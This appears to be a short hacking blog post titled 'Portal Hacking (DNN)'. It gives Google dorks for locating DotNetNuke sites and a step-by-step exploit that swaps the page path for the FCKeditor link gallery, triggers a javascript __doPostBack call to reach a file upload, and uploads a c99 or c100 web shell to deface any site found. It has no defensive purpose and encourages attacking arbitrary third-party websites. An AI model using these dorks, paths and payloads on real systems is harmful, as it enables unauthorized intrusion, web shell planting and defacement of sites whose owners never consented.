One more hacking method called "Portal Hacking (DNN)". This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for
hacking a websites..
Here U can use dez two Google Dorks
1- inurl:"/portals/0"
2- inurl:/tabid/36/language/en-US/Default.aspx
You can also modify this google dork according to your need & requirement
Here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 1 :
http://www.google.com
Step 2:
Now enter this dork
:inurl:/tabid/36/language/en-US/Default.aspx this is a dork to find the Portal Vulnerable sites, use it wisely.
Step 3:
you will find many sites, Select the site which you are comfortable with.
Step 4:
For example take this site.
http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx
Step 5: Now replace
/Home/tabid/36/Language/en-US/Default.aspx
with this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6: You will get a Link Gallary page.So far so good!
Step 7: Dont do anything for now,wait for the next step...
Step 8: Now replace the URL in the address bar with a Simple Script
javascript:__doPostBack('ctlURL$cmdUpload','')
Step 9: You will Find the Upload Option
Step 10:
Select Root
Step 11:
Upload your package Your Shell c99,c100 , Images, etc
After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have & upload here.
Now Go to main page and refresh. you have seen hacked the website.
Done..!!
0 comments:
Post a Comment